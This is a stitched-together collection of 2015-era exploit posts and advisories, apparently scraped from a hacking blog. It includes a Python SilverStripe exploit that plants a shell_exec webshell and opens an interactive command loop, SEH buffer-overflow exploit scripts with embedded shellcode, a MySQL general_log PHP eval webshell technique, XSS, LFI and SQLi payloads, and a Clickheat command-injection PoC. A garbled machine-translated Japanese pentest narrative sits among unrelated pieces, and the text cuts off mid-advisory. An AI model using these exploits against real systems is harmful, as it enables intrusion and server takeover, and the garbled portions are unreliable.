Clickheat 1.13+ Unauthenticated RCE
-----------------------------------
The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state.
I have discovered a vulnerability in Clickheat 1.13 onwards that would allow an attacker to execute arbitrary commands on the remote webserver, in the context of the user running the webserver, without authentication. This could lead to unauthenticated access to the Clickheat web application, and potentially complete takeover of the remote webserver.
For the exploit to be successful, the webserver (Apache was tested in this case) must be configured to handle Perl (.pl) scripts and have the ExecCGI directive present in the VirtualHost configuration.
The issue stems from a script called parseClickLogs.pl in the /scripts directory of clickheat. If the Apache configuration is setup as above, this script will be executed when a user visits /clickheat/scripts/parseClickLogs.pl, as shown in Apache logs:
[Tue May 12 13:36:27.068012 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] AH01215: usage: ./parseClickLogs.pl apache_logs_file dest_path [domain_ignored]
[Tue May 12 13:36:27.070133 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] End of script output before headers: parseClickLogs.pl
Arbitrary parameters can be supplied to the script directly from the URL, separated by +'s.
In the script, on line 48 is a vulnerable open() command:
open(LOGFILE, $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile);
The open() command is vulnerable because the $srcFile parameter has not been sanitized in any way, it is simply the first parameter passed into the script. Also the open() command has not been explicitly set for input only, meaning its behavior can be manipulated by appending a pipe (|) symbol to input parameters. See here for discussion: http://www.cgisecurity.com/lib/sips.html.
POC
----
The following POC shows how to gain access to the Clickheat configuration data by copying /clickheat/config/config.php to a plain text file for viewing.
- Copy config.php using arbitrary commands on the server:
GET /clickheat/scripts/parseClickLogs.pl?cp ../config/config.php conf.txt|+two
- View newly created copy of config.php (\ is appended to the filename)
GET /clickheat/scripts/conf.txt\
Mitigation
----------
A simple mitigation would be to either remove this script if it is not required by the core functionality of Clickheat, or move it outside of the publicly accessible HTML path. You could also explicitly set the open() to only allow for input, such as:
open(LOGFILE, "<$srcFile") or die("Impossible d'ouvrir le fichier ".$srcFile);
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863538207
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
序文
承認されたテストでは、少し前のテストでは、一歩なしにはゲッシェルの目的を達成できないと感じました。単一の脆弱性は確かに普通ですが、組み合わせると、予期しない化学効果がある可能性があります。
予備テスト
このサイトを取得したとき、メンバーのログインインターフェイスを一目で見ました。最初は登録について考えましたが、メンバーシップ機能は非常に少なく、検証コードがないと感じました。バックエンド管理者もメンバーである場合、バックエンドにアクセスして試してみることはできませんか?
携帯電話番号のログインが表示されますが、管理者を試してみて、フロントデスクに混乱しないでください。ユーザー名を列挙できることは偶然であり、管理者アカウントもあります。爆発しなければごめんなさい。
辞書では、Duck King's Dictionary、Blasting Artifactを使用しています。この辞書は、多くのサイト(https://github.com/thekingofduck/fuzzdicts)を爆破するために使用されています。今回はそれを爆破することができて幸運でした。
背景に到達してログインすると、管理者は同じパスワードを使用してログインしたいと思っています。接尾辞PHPを追加して、ワンストップのゲルシェルを見つけてアップロードします。
編集者が画像をアップロードするのを見たとき、物事はそれほど単純ではないと感じました。予想通り、接尾辞の追加は機能しませんでした
ThinkCMF Webサイトビルディングシステムであることがわかりました。私はオンラインで脆弱性を検索し、脆弱性のコレクションを見ました(https://www.hacking8.com/bug-web/thinkcms/thinkcmf%E6%BC%8F%E6%B4%9Eです。私は検索を続けました(https://www.freebuf.com/vuls/217586.html)。基本的に、私はすべてのペイロードを試しました。脆弱性がハイバージョンで修正されたか、使用方法が正しくなかったが、それは正常に悪用されていなかったはずです。いくつかの方法はウェブサイトにとって破壊的であり、私がそれを試してみると、私はbeatられて死ぬことはありません。今まで我慢できないので、抜け穴を見つけるようにしてください。退屈できない場合は、もっと抜け穴を見つけてください。リーダーの話を聞くことはできません。
高度なステージ
最初にウェブサイトを開くと、Googleプラグインセンサー(T00LSで見つかります)をインストールし、Webサイトの繊細なディレクトリを最初に検出できます。
NMAPを使用してオープンポートを検出し、ポート3306が一般に公開されていることがわかりました。希望なしに3306を爆破したいと思います。とにかく、私はいくつかの3306パスワードを破裂させませんでした。私は超弱いパスワードチェックツールを使用してから、Duck King's Dictionaryを使用しました。辞書が強力であるのか、それとも運が爆発しているのかを誰が知っていますか?ちなみに、これは弱いパスワードではありません。辞書にはこのパスワードがあるとしか言えません。辞書が存在する限り、それは間違っていません。
次は通常の操作です。ロギングを試してください
「%一般%」のような変数を表示します。ログステータスを表示します
グローバルgeneral_log='on' on 'nog log reading and writingを設定します
グローバルgeneral_log_file='xxx.php'ログパスを指定します
'?php eval($ _ post [' cmd ']);'を選択しますxxx.phpにログを書き込みます
その他の脆弱性
責任ある態度に基づいて、他のいくつかの抜け穴が発見されましたが、それらは比較的有害ではありませんが、テストレポートを書く必要がない場合は、書くことができます。
ログインIP偽造この背景には一般に、ユーザーのログインIPを記録する習慣がありますが、IPがIPを記録するときにIPが選択された場合、攻撃者はログインIPを偽造できます。 IPの正当性が確認されていない場合、XSSペイロードを構築してストレージXSSをトリガーすることは不可能ではありません。テスト中に数回遭遇しました。ストレージXSSは、メンバーのログインIPが記録されるバックグラウンドにあります。
ただし、ここでの唯一の欠点は、背景がIPの正当性をチェックすることです。違法IPの場合、0.0.0.0.0にリセットされます。
最優先の脆弱性でログインした後、管理者は自分で動作できないことがわかりました。これは恥ずかしいです。管理者は情報を変更できませんでした。
これは、変更できるリンクを見つけるための非常に簡単な方法であり、URLを変更して管理者の情報を変更します。経験によると、管理者が独自の情報を変更する状況の多くは、フロントエンドの制限です。
その後、詳細ページがポップアップし、変更できます。ここでは、メンバーシップレベルを変更して、普通のメンバーからVIPに自分自身を変更してください。管理者はどのようにして普通のメンバーになることができますか?
要約1。ターゲットサイト管理者の背景に管理者アカウントを入力します。パスワードが任意の場合、パスワードが表示され、管理アカウントが存在します。 2。BPの侵入者機能を通じて管理者アカウントを爆破します。パスワード辞書では、Fuzzdicts Dictionary(https://github.com/thekingofduck/fuzzdicts)を使用しています。 3。バックグラウンドを入力した後、画像のアップロードがアップロードされましたが、アップロードサイトのターゲットサイトはホワイトリストから制限されており、文をアップロードできません。 4。クラウドクリケットを通じて、ターゲットサイトはCMSフィンガープリントで検出され、ThinkCMシステムであることがわかりました。いくつかの歴史的な脆弱性をテストしましたが、実りはありませんでした。 16.情報検出は、検出のためにGoogle Chromeプラグインセンサーを介して実行され、PHPINFO.PHPが見つかりました。ウェブサイトの絶対パスはここに表示されます。 17. NAMPを介してターゲットサイトのIPをスキャンし、ポート3306 18があることを見つけます。ターゲットサイトのポート3306は、超弱いパスワードツールを通して爆破され、パスワードは最終的に正常に爆破されました。 19. NAVICATを介してターゲットサイトMySQLにリモートで接続し、「%一般%」のようなSQLコマンド端子表示変数でログログを介して文を書きます。ログステータスを表示するグローバルgeneral_log='on' on 'on on on on on log reading and writing set set set set set set set set set set set set set set xxx.php'ログパス選択'?php eval($ _ post [' cmd ']);' xxx.php20にログを書き込みます。最後に、アリの剣を通して正常に接続します。出典:https://xz.aliyun.com/t/10460
# source: https://www.securityfocus.com/bid/53282/info
#
# SilverStripe is prone to a remote PHP code-injection vulnerability.
#
# An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
#
# SilverStripe 2.4.7 is vulnerable; other versions may also be affected.
#
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt
def Menu():
print "\n\n-------------------------------------------------------"
print "-Kullanim Klavuzu [ USAGE ] "
print "-------------------------------------------------------"
print "- Temel Kullanim - I [ Default Usage ] : "
print "- python exo.py www.target.com / \n"
print "- Temel Kullanim - II [ Default Usage ] : "
print "- python exo.py www.target.com /path/ \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
Menu()
exit(1)
host = sys.argv[1]
path = sys.argv[2]
print " [+] Exploit ediliyor..!"
payload="blackcandy');fwrite(fopen("
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'db[MySQLDatabase][server]':'localhost',
'db[MySQLDatabase][username]':'root',
'db[MySQLDatabase][password]':'qwe123',
'db[MySQLDatabase][database]':'SS_mysite',
'db[MSSQLDatabase][server]':'localhost',
'db[MSSQLDatabase][username]':'root',
'db[MSSQLDatabase][password]':'qwe123',
'db[MSSQLDatabase][database]':'SS_mysite',
'db[PostgreSQLDatabase][server]':'localhost',
'db[PostgreSQLDatabase][username]':'root',
'db[PostgreSQLDatabase][password]':'qwe123',
'db[PostgreSQLDatabase][database]':'SS_mysite',
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
'db[SQLiteDatabase][database]':'SS_mysite',
'admin[username]':'admin',
'admin[password]':'qwe123',
'locale':'en_US',
'template':payload,
'stats':'on',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-us,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"keep-alive",
"Referer":"http://" + host + path+"install.php",
"Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
}
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
print "[+]Http Hatasi : " + responce.status + "\n"
print "Cant Exploit!:("
if responce.status == 200:
komut=""
while( komut != "exit" ):
komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()
source: https://www.securityfocus.com/bid/53287/info
Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Croogo CMS 1.3.4 is vulnerable; other versions may also be affected.
URL: http://www.example.com/croogo/admin/users
<td>"><iframe src="a" onload='alert("VL")' <<="" td=""> <td>"><iframe src=a onload=alert("VL")
<</td> <td>asdasd () aol com</td>
<td><a href="/croogo/admin/users/edit/2">Edit</a> <a href="/croogo/admin/users/delete/2/token:
c68c0779f65f5657a8d17c28daebcc7a15fe51e3"
onclick="return confirm('Are you sure?');">Delete</a></td></tr>
URL: http://www.example.com/croogo/admin/roles
<tr class="striped"><td>4</td> <td>"><iframe src="a" onload='alert("VL")'
<<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td>
<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete
source: https://www.securityfocus.com/bid/54611/info
The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
Document Title:
===============
Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1535
Video: http://www.vulnerability-lab.com/get_content.php?id=1537
Release Date:
=============
2015-06-29
Vulnerability Laboratory ID (VL-ID):
====================================
1535
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn`t miss a
thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful
editing functions. Do it the easy way with BB FlashBack screen recorder. Its never been easier for everyone to see your movies.
BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices.(FlashBack Connect
is currently in Beta, and available only to Pro and Standard edition purchasers).
(Copy of the Vendor Homepage: http://www.bbsoftware.co.uk/bbflashback.aspx )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a local seh buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software.
Vulnerability Disclosure Timeline:
==================================
2015-06-29: Researcher Notification & Coordination (Ateeq Khan)
Discovery Status:
=================
Published
Affected Product(s):
====================
Blueberry Software
Product: Blueberry Express - Software 5.9.0.3678
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software.
The vulnerability allows local or remote attacker to gain higher system or access privileges by exploitation of a
classic seh buffer overflow vulnerability.
The local SEH Buffer Overflow affects multiple products including the BBFlashBack Recorder, Batch Export etc.
Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with low privilege system user account.
The attacker vector of the issue is server-side and the request method to execute the shellcode is local.
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
POC Description:
For POC, the researcher installed the software with admin privileges on a windows system (allowed to run for all users), while application
still running in the background, logged off and logged in with a different (low privileged) user. Exploited the vulnerability successfully
hence giving the researcher a system shell with elevated admin privileges. Privilege escalation is possible in this scenario.
Malwares wont be able to exploit this vulnerability remotely as this is a Local exploit.
Manual steps to reproduce the vulnerability ...
1) Run BB Flashback Express Recorder
2) Goto TOOLS > OPTIONS > MISC
3) Click on "Use custom folder" under the Temp Folder module
4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder
5) Click OK
Note: Calculator should popup hence proving the existence of this vulnerability
PoC: Exploitcode
# Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit
# Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/)
# Windows Calc.exe Shellcode - Metasploit
shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
push="\x90" * 288 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled
print "Creating expoit file"
f=open("recorder.txt","w")
try:
f.write(push+nseh+seh+nopsled+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
PoC#2: Exploitcode
# Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local)
# Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/)
print "Creating expoit file"
f=open("batch.txt","w") #Create the file
# Windows Calc.exe Shellcode - Metasploit
shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
push="\x90" * 6596 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled
try:
f.write(push+nseh+seh+nopsled+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
Reference(s):
http://www.bbsoftware.co.uk/
http://www.bbsoftware.co.uk/bbflashback/download.aspx
Security Risk:
==============
The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
-----------------
Background
-----------------
Orchard is a free, open source, community-focused content management
system written in ASP.NET platform using the ASP.NET MVC framework. Its
vision is to create shared components for building ASP.NET applications
and extensions, and specific applications that leverage these components
to meet the needs of end-users, scripters, and developers.
------------------------
Software Version
------------------------
The version of Orchard affected by this issue are 1.7.3, 1.8.2 and
1.9.0. Version below 1.7.3 are not affected
---------------
Description
---------------
A persistent XSS vulnerability was discovered in the Users module that
is distributed with the core distribution of the CMS. The issue
potentially allows elevation of privileges by tricking an administrator
to execute some custom crafted script on his behalf. The issue affects
the Username field, since a user is allowed to register a username
containing potentially dangerous characters.
More information can be found here
http://docs.orchardproject.net/Documentation/Patch-20150630
----------------------
Proof of Concept
----------------------
1. Attacker registers a new user account with username e.x
<script>alert("XSS")</script>
2. The administrator attempts to delete the account using the Users core
module.
3. Once the administrator clicks on the "delete" action, the XSS payload
is executed.
-------------
Mitigation
-------------
See http://docs.orchardproject.net/Documentation/Patch-20150630
-----------
Timeline
-----------
2015-06-10 Vulnerability reported to Orchard CMS development team
2015-06-12 Response and issue verification
2015-06-30 Update and patch release
2015-07-06 Public Disclosure
---------
Credits
---------
Reported by Paris Zoumpouloglou of Project Zero labs
(https://projectzero.gr)
--
Paris Zoumpouloglou
@pzmini0n
https://projectzero.gr
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.
90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
1. Advisory Information
Title: AirLive Multiple Products OS Command Injection
Advisory ID: CORE-2015-0012
Advisory URL: http://www.coresecurity.com/advisories/airlive-multiple-products-os-command-injection
Date published: 2015-07-06
Date of last update: 2015-07-06
Vendors contacted: AirLive
Release mode: User release
2. Vulnerability Information
Class: OS Command Injection [CWE-78], OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2279, CVE-2014-8389
3. Vulnerability Description
AirLive MD-3025 [3], BU-3026 [4], BU-2015 [2], WL-2000CAM [5] and POE-200CAM [6] are IP cameras designed for professional surveillance and security applications. The built-in IR LEDs provide high quality nighttime monitoring.
These AirLive [1] devices are vulnerable to an OS Command Injection Vulnerability. In the case of the MD-3025, BU-3026 and BU-2015 cameras, the vulnerability lies in the cgi_test.cgi binary file. In the case of the WL-2000CAM and POE-200CAM cameras, the command injection can be performed using the vulnerable wireless_mft.cgi binary file.
4. Vulnerable Packages
AirLive BU-2015 with firmware 1.03.18 16.06.2014
AirLive BU-3026 with firmware 1.43 21.08.2014
AirLive MD-3025 with firmware 1.81 21.08.2014
AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011
AirLive POE-200CAM v2 with firmware LM.1.6.17.01
Other devices may be affected too, but they were not checked.
5. Vendor Information, Solutions and Workarounds
Core Security recommends to apply a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.
Contact the vendor for further information.
6. Credits
These vulnerabilities were discovered and researched by Nahuel Riva from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Security Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. OS Command Injection in cgi_test.cgi when handling certain parameters
[CVE-2015-2279] There is an OS Command Injection in the cgi_test.cgi binary file in the AirLive MD-3025, BU-3026 and BU-2015 cameras when handling certain parameters. That specific CGI file can be requested without authentication, unless the user specified in the configuration of the camera that every communication should be performed over HTTPS (not enabled by default).
The vulnerable parameters are the following:
write_mac
write_pid
write_msn
write_tan
write_hdv
These parameters are used to invoke another binary file called "info_writer".
In the sub_93F4 function it uses the "QUERY_STRING" and checks if it contains any of the parameters followed by an ampersand symbol:
sub_93F4
STMFD SP!, {R4-R7,LR}
LDR R0, =aQuery_string ; "QUERY_STRING"
SUB SP, SP, #4
BL getenv
MOV R1, #0 ; c
MOV R2, #0x12 ; n
MOV R6, R0
LDR R0, =unk_14B70 ; s
BL memset
LDR R0, =aContentTypeTex ; "Content-type: text/html\n\n<body>"
BL printf
MOV R5, #0
LDR R7, =off_B7D0
MOV R4, R5
B loc_943C
[...]
loc_9540 ; jumptable 00009470 case 7
MOV R0, R6
LDR R1, =aWrite_pid ; "write_pid&"
BL strstr
CMP R0, #0
BEQ loc_94CC ; jumptable 00009470 default case
[...]
It then uses whatever appears after the ampersand symbol in a call to printf() in order to put together the parameter with which the "info_writer" binary will be invoked. Finally, it calls the system() function:
[...]
.text:00009730 loc_9730 ; CODE XREF: .text:00009714j
.text:00009730 MOV R2, R5
.text:00009734 LDR R1, =aOptIpncInfo__1 ; "/opt/ipnc/info_writer -p %s > /dev/null"
.text:00009738 MOV R0, SP
.text:0000973C BL sprintf
.text:00009740 MOV R0, SP
.text:00009744 BL system
.text:00009748 MOV R2, R5
.text:0000974C LDR R1, =aWrite_pidOkPid ; "WRITE_PID OK, PID=%s\r\n"
.text:00009750 LDR R0, =unk_1977C
.text:00009754 MOV R4, SP
.text:00009758 BL sprintf
.text:0000975C B loc_9728
[...]
Consequently, if a semicolon (;) is used after the ampersand symbol, arbitrary commands can be injected into the operating system.
It's important to take into account that depending on the parameter used, there are checks like this (corresponding to the write_pid parameter):
.text:00009708 MOV R0, R5
.text:0000970C BL strlen
.text:00009710 CMP R0, #9
This verifies that the parameter has a specific length. Because of this, the injection is somewhat limited. Nevertheless, there are possible commands that can be executed, for example:
Proof of Concept:
